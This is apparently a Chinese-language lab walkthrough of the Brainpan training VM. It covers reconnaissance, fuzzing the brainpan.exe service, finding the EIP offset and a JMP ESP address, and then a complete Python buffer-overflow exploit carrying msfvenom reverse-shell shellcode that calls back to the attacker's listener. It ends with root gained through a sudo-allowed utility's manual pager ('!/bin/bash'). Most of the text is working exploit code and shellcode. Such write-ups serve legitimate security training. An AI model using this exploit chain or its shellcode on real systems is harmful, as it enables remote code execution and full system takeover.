BrianPan

1
2
3
ip a

192.168.241.128

信息搜集

靶机发现

1
sudo nmap -sn  192.168.241.0/24

目标靶机 ip 为 192.168.241.183

端口发现

1
sudo nmap -sT --min-rate 10000 -p-  192.168.241.183 -oA nmapscan/ports
1
2
3
PORT      STATE SERVICE
9999/tcp  open  abyss
10000/tcp open  snet-sensor-mgmt

渗透打点

端口扫描

1
sudo nmap -sT -sV -sC -O -p9999,10000 192.168.241.183 -oA nmapscan/detail
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
PORT      STATE SERVICE VERSION
9999/tcp  open  abyss?
| fingerprint-strings: 
|   NULL: 
|     _| _| 
|     _|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_| 
|     _|_| _| _| _| _| _| _| _| _| _| _| _|
|     _|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
|     [________________________ WELCOME TO BRAINPAN _________________________]
|_    ENTER THE PASSWORD
10000/tcp open  http    SimpleHTTPServer 0.6 (Python 2.7.3)
|_http-server-header: SimpleHTTP/0.6 Python/2.7.3
|_http-title: Site doesn't have a title (text/html).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9999-TCP:V=7.94%I=7%D=3/24%Time=67E14BEE%P=x86_64-pc-linux-gnu%
[________________________\x20WELCOME\x20TO\x20BRAINPAN\x
MAC Address: 00:0C:29:1A:6B:9E (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
Network Distance: 1 hop

UDP 扫描

1
sudo nmap -sU --top-ports 20 192.168.241.183 -oA nmapscan/udp
1
2
3
4
5
6
7
8
9
10
PORT      STATE         SERVICE
68/udp    open|filtered dhcpc
123/udp   open|filtered ntp
135/udp   open|filtered msrpc
137/udp   open|filtered netbios-ns
138/udp   open|filtered netbios-dgm
161/udp   open|filtered snmp
500/udp   open|filtered isakmp
520/udp   open|filtered route
1434/udp  open|filtered ms-sql-m

漏洞扫描

1
sudo nmap --script=vuln -p9999,10000 192.168.241.183 -oA nmapscan/vuln
1
2
3
4
PORT      STATE SERVICE
9999/tcp  open  abyss
10000/tcp open  snet-sensor-mgmt
|_http-vuln-cve2006-3392: ERROR: Script execution failed (use -d to debug)

渗透测试

9999 nc

1
nc 192.168.241.183 9999

WELCOME TO BRAINPAN, ENTER THE PASSWORD

需要密码

10000 web

一个编程安全的报告页面
目录爆破看看

1
2
3
/adlogger.zip

/bin

扫出来一个 exe
192.168.241.183:10000/bin/brainpan.exe

是一个Winsock 网络程序, 里面的一些输出字符串和 9999 端口进行的程序基本一致

1
2
3
strings

radare2
  1. 在接收到客户端的数据后,调用了_get_reply函数进行处理,可能包含访问控制或验证 logic。
  2. 根据验证结果,程序会输出“ACCESS_GRANTED”或“ACCESS_DENIED”信息。
  3. 虽然没有直接的密码加密函数调用,但验证 logic可能基于接收的特定数据进行检查
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
[get_reply] s = [%s]
[get_reply] copied %d bytes to buffer
shitstorm

[+] initializing winsock...
[!] winsock init failed: %d
done.
[!] could not create socket: %d
[+] server socket created.
[!] bind failed: %d
[+] bind done on port %d
[+] waiting for connections.
[+] received connection.
[+] check is %d
[!] accept failed: %d
[+] cleaning up.
-LIBGCCW32-EH-3-SJLJ-GTHR-MINGW32
w32_sharedptr->size == sizeof(W32_EH_SHARED)
../../gcc-3.4.5/gcc/config/i386/w32-shared-ptr.c
GetAtomNameA (atom, s, sizeof(s)) != 0
AddAtomA
ExitProcess
FindAtomA
GetAtomNameA
SetUnhandledExceptionFilter

看不明白 看看靶机精讲关于二进制的攻击部分

exe

确认大致溢出范围

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
#!/usr/bin/python
import socket
import time
import sys

# Initial buffer size
size = 100

while True:
    try:
        # Print the current buffer size being sent
        print("\n[+] Sent evil buffer %s bytes " % size)
        # Create a buffer of 'size' bytes, all 'A'
        buffer = 'A' * size
        # Create a TCP socket
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # Establish a connection to the target IP and port
        s.connect(("192.168.241.1", 9999))
        # Send the buffer
        s.send(buffer.encode())  # encode to bytes for Python 3 compatibility
        # Close the socket after sending the buffer
        s.close()
        # Increase buffer size for the next iteration
        size += 100
        # Wait for 3 seconds before the next attempt
        time.sleep(3)

    except Exception as e:
        # Print an error message if there was an issue connecting or sending
        print "[+] Could not connect."
        sys.exit()

接收端最大只有

1
2
3
4
5
6
7
8
9
10
11
[+] initializing winsock...done.
[+] server socket created.
[+] bind done on port 9999
[+] waiting for connections.
[+] received connection.
[get_reply] s = [AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]
[get_reply] copied 100 bytes to buffer
[+] check is -1
...
...
[get_reply] copied 600 bytes to buffer

大概是 600 bytes

精确

msf 生成一个有区分度的 600 bytes 字符串

1
2
3
msf-pattern_create -l 600

Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
#!/usr/bin/python
import socket
import time
import sys

# Initial buffer size
size = 100

while True:
    try:
        # Print the current buffer size being sent
        print("\n[+] Sent evil buffer %s bytes " % size)
        # Create a buffer of 'size' bytes, all 'A'
        buffer = 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9'
        # Create a TCP socket
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # Establish a connection to the target IP and port
        s.connect(("192.168.241.1", 9999))
        # Send the buffer
        s.send(buffer.encode())  # encode to bytes for Python 3 compatibility
        # Close the socket after sending the buffer
        s.close()
        # Increase buffer size for the next iteration
        size += 100
        # Wait for 3 seconds before the next attempt
        time.sleep(3)

    except Exception as e:
        # Print an error message if there was an issue connecting or sending
        print "[+] Could not connect."
        sys.exit()

![[03-24_22-59.png]]

动态调试步进 走五步可以看到输入的内容出现在 EDX 005FF700

而且可以看到 EIP 35724134 这是下一个指令的地址 (指令指针)

那现在就是利用 EIP 去找到输入字符串中的截断位置

1
2
3
msf-pattern_offset -l 600 -q 35724134

[*] Exact match at offset 524

从 524 开始往后的四个字节 525 526 527 528 填充了 EIP 指向的内容
之后开始出现溢出

EIP 定位

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
#!/usr/bin/python
import socket
import time
import sys

# Initial buffer size
size = 100

while True:
    try:
        # Print the current buffer size being sent
        print("\n[+] Sent evil buffer %s bytes " % size)
        # Create a buffer of 'size' bytes, all 'A'
        buffer = 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9'
        # Create a TCP socket
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # Establish a connection to the target IP and port
        s.connect(("192.168.241.1", 9999))
        # Send the buffer
        s.send(buffer.encode())  # encode to bytes for Python 3 compatibility
        # Close the socket after sending the buffer
        s.close()
        # Increase buffer size for the next iteration
        size += 100
        # Wait for 3 seconds before the next attempt
        time.sleep(3)

    except Exception as e:
        # Print an error message if there was an issue connecting or sending
        print "[+] Could not connect."
        sys.exit()

![[03-24_23-15.png]]

EDX 中全为 A

ESP 中全为 C 且非常整齐

![[03-24_23-20.png]]

EIP 之后就能使用 shellcode 了

ESP 大小确认

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
#!/usr/bin/python
import socket
import time
import sys

# Initial buffer size
size = 100

while True:
    try:
        # Print the current buffer size being sent
        print("\n[+] Sent evil buffer %s bytes " % size)
        # Create a buffer of 'size' bytes, all 'A'
        buffer = 'A'*524 + 'B'*4 + 'C'* 800
        # Create a TCP socket
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # Establish a connection to the target IP and port
        s.connect(("192.168.241.1", 9999))
        # Send the buffer
        s.send(buffer.encode())  # encode to bytes for Python 3 compatibility
        # Close the socket after sending the buffer
        s.close()
        # Increase buffer size for the next iteration
        size += 100
        # Wait for 3 seconds before the next attempt
        time.sleep(3)

    except Exception as e:
        # Print an error message if there was an issue connecting or sending
        print "[+] Could not connect."
        sys.exit()

为提供 shellcode 完成利用体积, 增加 C 的数量 看多少会让程序崩溃

![[03-24_23-27.png]]

抛出异常的位置是在 005FFAE4 , C 开始出现的地址是在 005FF910

一共是 python(直接算) : 0x005FFAE4-0x005FF910 468 字节

是可以塞下一个 shellcode 的

ESP 坏字符确认

坏字符的存在取决于不同程序和协议等 所以需要具体讨论, 避免坏字符影响 shellcode 的完整性

这里需要使用到 badchars https://github.com/cytopia/badchars.git

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
./badchars -f ruby
badchars = (
  "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" +
  "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" +
  "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" +
  "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" +
  "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" +
  "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" +
  "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" +
  "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" +
  "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" +
  "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" +
  "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" +
  "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" +
  "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" +
  "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" +
  "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" +
  "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)

工具列出了所有可能的坏字符
把这些坏字符填入 C 中 , 验证当前不可以使用的”坏字符” 具体有哪些

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
#!/usr/bin/python
import socket
import time
import sys
size = 100

while True:
    try:
        print("\n[+] Sent evil buffer %s bytes " % size)
        badchars = (
  "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" +
  "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" +
  "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" +
  "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" +
  "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" +
  "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" +
  "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" +
  "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" +
  "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" +
  "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" +
  "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" +
  "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" +
  "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" +
  "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" +
  "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" +
  "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)
        buffer = 'A'*524 + 'B'*4 + badchars
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(("192.168.241.1", 9999))
        s.send(buffer.encode())  # encode to bytes for Python 3 compatibility
        s.close()
        size += 100
        time.sleep(3)
    except Exception as e:
        print "[+] Could not connect."
        sys.exit()

再次执行

根据内存情况可以看到

![[03-25_20-00.png]]

除了 00 都不是坏字节!

定位 ESP

利用 jump 汇编指令 在 EIP 处跳转到 ESP (因为位置不确定)

1
2
3
msf-nasm_shell
nasm > jmp esp
00000000  FFE4              jmp esp

写入的内容需要是 opcode ( FFE4 )

1
2
!mona find -s "\xff\xe4" -m brianpan.exe
> 0x311712f3

注意小端 CPU 倒序写入

1
buffer = 'A'*524 + '\xf3\x12\x17\x31' + shellcode

生成一个 shellcode

1
sudo msfvenom -p windows/shell_reverse_tcp LHOST=192.168.241.128 LPORT=443 -b "\x00" -e x86/shikata_ga_nai -f c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of c file: 1506 bytes

unsigned char buf[] = 
"\xdb\xc6\xd9\x74\x24\xf4\x5a\x33\xc9\xbb\x9b\x9a\x52\x76"
"\xb1\x52\x31\x5a\x17\x03\x5a\x17\x83\x71\x66\xb0\x83\x79"
"\x7f\xb7\x6c\x81\x80\xd8\xe5\x64\xb1\xd8\x92\xed\xe2\xe8"
"\xd1\xa3\x0e\x82\xb4\x57\x84\xe6\x10\x58\x2d\x4c\x47\x57"
"\xae\xfd\xbb\xf6\x2c\xfc\xef\xd8\x0d\xcf\xfd\x19\x49\x32"
"\x0f\x4b\x02\x38\xa2\x7b\x27\x74\x7f\xf0\x7b\x98\x07\xe5"
"\xcc\x9b\x26\xb8\x47\xc2\xe8\x3b\x8b\x7e\xa1\x23\xc8\xbb"
"\x7b\xd8\x3a\x37\x7a\x08\x73\xb8\xd1\x75\xbb\x4b\x2b\xb2"
"\x7c\xb4\x5e\xca\x7e\x49\x59\x09\xfc\x95\xec\x89\xa6\x5e"
"\x56\x75\x56\xb2\x01\xfe\x54\x7f\x45\x58\x79\x7e\x8a\xd3"
"\x85\x0b\x2d\x33\x0c\x4f\x0a\x97\x54\x0b\x33\x8e\x30\xfa"
"\x4c\xd0\x9a\xa3\xe8\x9b\x37\xb7\x80\xc6\x5f\x74\xa9\xf8"
"\x9f\x12\xba\x8b\xad\xbd\x10\x03\x9e\x36\xbf\xd4\xe1\x6c"
"\x07\x4a\x1c\x8f\x78\x43\xdb\xdb\x28\xfb\xca\x63\xa3\xfb"
"\xf3\xb1\x64\xab\x5b\x6a\xc5\x1b\x1c\xda\xad\x71\x93\x05"
"\xcd\x7a\x79\x2e\x64\x81\xea\x91\xd1\x78\x6a\x79\x20\x7a"
"\x6a\xc1\xad\x9c\x06\x25\xf8\x37\xbf\xdc\xa1\xc3\x5e\x20"
"\x7c\xae\x61\xaa\x73\x4f\x2f\x5b\xf9\x43\xd8\xab\xb4\x39"
"\x4f\xb3\x62\x55\x13\x26\xe9\xa5\x5a\x5b\xa6\xf2\x0b\xad"
"\xbf\x96\xa1\x94\x69\x84\x3b\x40\x51\x0c\xe0\xb1\x5c\x8d"
"\x65\x8d\x7a\x9d\xb3\x0e\xc7\xc9\x6b\x59\x91\xa7\xcd\x33"
"\x53\x11\x84\xe8\x3d\xf5\x51\xc3\xfd\x83\x5d\x0e\x88\x6b"
"\xef\xe7\xcd\x94\xc0\x6f\xda\xed\x3c\x10\x25\x24\x85\x20"
"\x6c\x64\xac\xa8\x29\xfd\xec\xb4\xc9\x28\x32\xc1\x49\xd8"
"\xcb\x36\x51\xa9\xce\x73\xd5\x42\xa3\xec\xb0\x64\x10\x0c"
"\x91";

351 字节 不超过 600 ok

同时需要注意一下 因为使用了 shikata_ga_nai 编码器进行绕过免杀处理
shellcode 前会生成一个桩 用于解码, 要为这个留出一定空间 也就是 NOP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
#!/usr/bin/python
import socket
import time
import sys

# Set payload (windows_reverse_shell) for Windows
try:
    # Create a socket object
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Connect to the target IP and port
    s.connect(("192.168.241.1", 9999))
    # Example bad EBP address
    ebp = "311712f3"
    # Define bad characters to avoid
    badchars = '\x00'
    # Shellcode for Windows reverse shell
    shellcode = ("\xdb\xc6\xd9\x74\x24\xf4\x5a\x33\xc9\xbb\x9b\x9a\x52\x76"
"\xb1\x52\x31\x5a\x17\x03\x5a\x17\x83\x71\x66\xb0\x83\x79"
"\x7f\xb7\x6c\x81\x80\xd8\xe5\x64\xb1\xd8\x92\xed\xe2\xe8"
"\xd1\xa3\x0e\x82\xb4\x57\x84\xe6\x10\x58\x2d\x4c\x47\x57"
"\xae\xfd\xbb\xf6\x2c\xfc\xef\xd8\x0d\xcf\xfd\x19\x49\x32"
"\x0f\x4b\x02\x38\xa2\x7b\x27\x74\x7f\xf0\x7b\x98\x07\xe5"
"\xcc\x9b\x26\xb8\x47\xc2\xe8\x3b\x8b\x7e\xa1\x23\xc8\xbb"
"\x7b\xd8\x3a\x37\x7a\x08\x73\xb8\xd1\x75\xbb\x4b\x2b\xb2"
"\x7c\xb4\x5e\xca\x7e\x49\x59\x09\xfc\x95\xec\x89\xa6\x5e"
"\x56\x75\x56\xb2\x01\xfe\x54\x7f\x45\x58\x79\x7e\x8a\xd3"
"\x85\x0b\x2d\x33\x0c\x4f\x0a\x97\x54\x0b\x33\x8e\x30\xfa"
"\x4c\xd0\x9a\xa3\xe8\x9b\x37\xb7\x80\xc6\x5f\x74\xa9\xf8"
"\x9f\x12\xba\x8b\xad\xbd\x10\x03\x9e\x36\xbf\xd4\xe1\x6c"
"\x07\x4a\x1c\x8f\x78\x43\xdb\xdb\x28\xfb\xca\x63\xa3\xfb"
"\xf3\xb1\x64\xab\x5b\x6a\xc5\x1b\x1c\xda\xad\x71\x93\x05"
"\xcd\x7a\x79\x2e\x64\x81\xea\x91\xd1\x78\x6a\x79\x20\x7a"
"\x6a\xc1\xad\x9c\x06\x25\xf8\x37\xbf\xdc\xa1\xc3\x5e\x20"
"\x7c\xae\x61\xaa\x73\x4f\x2f\x5b\xf9\x43\xd8\xab\xb4\x39"
"\x4f\xb3\x62\x55\x13\x26\xe9\xa5\x5a\x5b\xa6\xf2\x0b\xad"
"\xbf\x96\xa1\x94\x69\x84\x3b\x40\x51\x0c\xe0\xb1\x5c\x8d"
"\x65\x8d\x7a\x9d\xb3\x0e\xc7\xc9\x6b\x59\x91\xa7\xcd\x33"
"\x53\x11\x84\xe8\x3d\xf5\x51\xc3\xfd\x83\x5d\x0e\x88\x6b"
"\xef\xe7\xcd\x94\xc0\x6f\xda\xed\x3c\x10\x25\x24\x85\x20"
"\x6c\x64\xac\xa8\x29\xfd\xec\xb4\xc9\x28\x32\xc1\x49\xd8"
"\xcb\x36\x51\xa9\xce\x73\xd5\x42\xa3\xec\xb0\x64\x10\x0c"
"\x91")
    # Create buffer with padding (524 A's), EBP overwrite, NOP sled (16 bytes), and shellcode
    buffer = 'A' * 524 + '\xf3\x12\x17\x31' + '\x90' * 16 + shellcode
    # Print info message
    print("\n[+] Sending evil buffer: 524 A's, EBP overwrite, 16 NOPs, and shellcode (Windows reverse shell).")
    # Send buffer to the target
    s.send(buffer)
    # Close the socket connection
    s.close()
    # Wait for a short period before exiting
    time.sleep(2)
    
except:
    # If unable to connect, print an error message and exit
    print("\n[+] Could not connect, error!")
    sys.exit()

提前开一个监听

1
2
3
listening on [any] 443 ...
connect to [192.168.241.128] from (UNKNOWN) [192.168.241.1] 54925
Microsoft Windows [�汾 10.0.26100.3476]

可以反弹 shell 秒断,估计是我本地防火墙的原因

EXP

现在把最后的 shellcode 更新为对方的 linux 主机以及 ip 即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
sudo msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.241.128 LPORT=443 -b "\x00" -e x86/shikata_ga_nai -f c

Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 95 (iteration=0)
x86/shikata_ga_nai chosen with final size 95
Payload size: 95 bytes
Final size of c file: 425 bytes
unsigned char buf[] = 
"\xdb\xc8\xd9\x74\x24\xf4\xb8\x20\x14\x87\x88\x5a\x31\xc9"
"\xb1\x12\x31\x42\x17\x83\xc2\x04\x03\x62\x07\x65\x7d\x53"
"\xfc\x9e\x9d\xc0\x41\x32\x08\xe4\xcc\x55\x7c\x8e\x03\x15"
"\xee\x17\x2c\x29\xdc\x27\x05\x2f\x27\x4f\x56\x67\x26\x0f"
"\x3e\x7a\xc9\x0e\x04\xf3\x28\xa0\x1c\x54\xfa\x93\x53\x57"
"\x75\xf2\x59\xd8\xd7\x9c\x0f\xf6\xa4\x34\xb8\x27\x64\xa6"
"\x51\xb1\x99\x74\xf1\x48\xbc\xc8\xfe\x87\xbf";
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
#!/usr/bin/python
import socket
import time
import sys

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("192.168.241.183", 9999))
    ebp = "311712f3"
    badchars = '\x00'
    shellcode = ("\xdb\xc8\xd9\x74\x24\xf4\xb8\x20\x14\x87\x88\x5a\x31\xc9"
"\xb1\x12\x31\x42\x17\x83\xc2\x04\x03\x62\x07\x65\x7d\x53"
"\xfc\x9e\x9d\xc0\x41\x32\x08\xe4\xcc\x55\x7c\x8e\x03\x15"
"\xee\x17\x2c\x29\xdc\x27\x05\x2f\x27\x4f\x56\x67\x26\x0f"
"\x3e\x7a\xc9\x0e\x04\xf3\x28\xa0\x1c\x54\xfa\x93\x53\x57"
"\x75\xf2\x59\xd8\xd7\x9c\x0f\xf6\xa4\x34\xb8\x27\x64\xa6"
"\x51\xb1\x99\x74\xf1\x48\xbc\xc8\xfe\x87\xbf")
    buffer = 'A' * 524 + '\xf3\x12\x17\x31' + '\x90' * 16 + shellcode
    print("\n[+] Sending evil buffer: 524 A's, EBP overwrite, 16 NOPs, and shellcode (Windows reverse shell).")
    s.send(buffer)
    s.close()
    time.sleep(2)
except:
    print("\n[+] Could not connect, error!")
    sys.exit()

成功拿到反弹 shell

提权

puck

1
2
3
4
5
6
7
8
9
10
11
12
13
uid=1002(puck) gid=1002(puck) groups=1002(puck)

Linux brainpan 3.5.0-25-generic 
#39-Ubuntu SMP Mon Feb 25 19:02:34 UTC 2013 i686 athlon i686 GNU/Linux
root:x:0:0:root:/root:/bin/bas
reynard:x:1000:1000:Reynard,,,:/home/reynard:/bin/bash
anansi:x:1001:1001:Anansi,,,:/home/anansi:/bin/bash
puck:x:1002:1002:Puck,,,:/home/puck:/bin/bash

User puck may run the following commands on this host:
(root) NOPASSWD: /home/anansi/bin/anansi_util

135808 -rwxr-xr-x 1 root root  513 Mar  6  2013 checksrv.sh

anansi_util

1
2
3
4
5
6
7
8
9
10
11
12
sudo /home/anansi/bin/anansi_util

Where [action] is one of:
- network
- proclist
- manual [command]

sudo /home/anansi/bin/anansi_util manual ls

> 进了一个Manual 交互

!/bin/bash

成功 root

root

![[03-25_21-31.png]]